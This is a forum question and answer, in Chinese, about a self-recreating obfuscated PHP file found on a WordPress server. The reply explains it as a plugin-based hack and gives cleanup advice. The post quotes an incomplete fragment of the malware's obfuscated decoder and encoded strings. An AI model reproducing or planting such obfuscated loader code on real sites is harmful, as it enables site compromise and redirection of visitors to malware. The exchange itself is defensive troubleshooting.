很抱歉,如果这是错误的网站发布。
基本上,我有一个服务器,这个文件一直在创建自己。该文件是一个PHP文件,包含代码:
<?php
$GLOBALS['XfZi37Vc'] = $_SERVER;
function ruexxCV1QobH($uiBP25)
{$MISwZvode = "";global $PYJ9QSAA;
for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++)
{$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94;
${YkT1GO68Y3rXB("iv[_^/1'"w;%")} = Lp4lS8SSZzAY("-15/*32B.3@@G9CJJ");
${YkT1GO68Y3rXB(",g0@#&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%'$");
${QDVtOC8("pt[v'$:=")} = lpkBre6(":<;)><97C");
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
${sGbDIY("!<!.x''ze")} = lpkBre6("kos|n|,'$nzxtr(x5~(");
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);};
${fW1u5W74("gh'"Co[")} = lpkBre6("*77@0>A-DE6@6C9;");
${rdfpzT0mw("n2lZ7t''")} = QDVtOC8(";:27");
我以前从未见过这样的代码。有人能告诉我它到底在做什么吗?
这是发生在Wordpress上的一次黑客攻击。可能是因为你使用了一个过时的第三方插件。这些可能有点难以检测,但这些代码可能被用来投放广告,或将用户重定向到外部内容或恶意软件。
您应该删除此代码并更新所有插件。
请记住,此代码也可能已将代码注入Wordpress数据库。特别是如果你有一个插件可以在Wordpress中启用"eval",这意味着可以从数据库中检索代码并进行eval。
如果这不能解决问题,你应该开始禁用第三方插件,直到你找到问题的根源。
Wordpress非常容易让自动脚本检测到,第三方插件可能是由对安全一无所知的人编写的。使用它们时需要非常小心,即使它们来自Wordpress.org。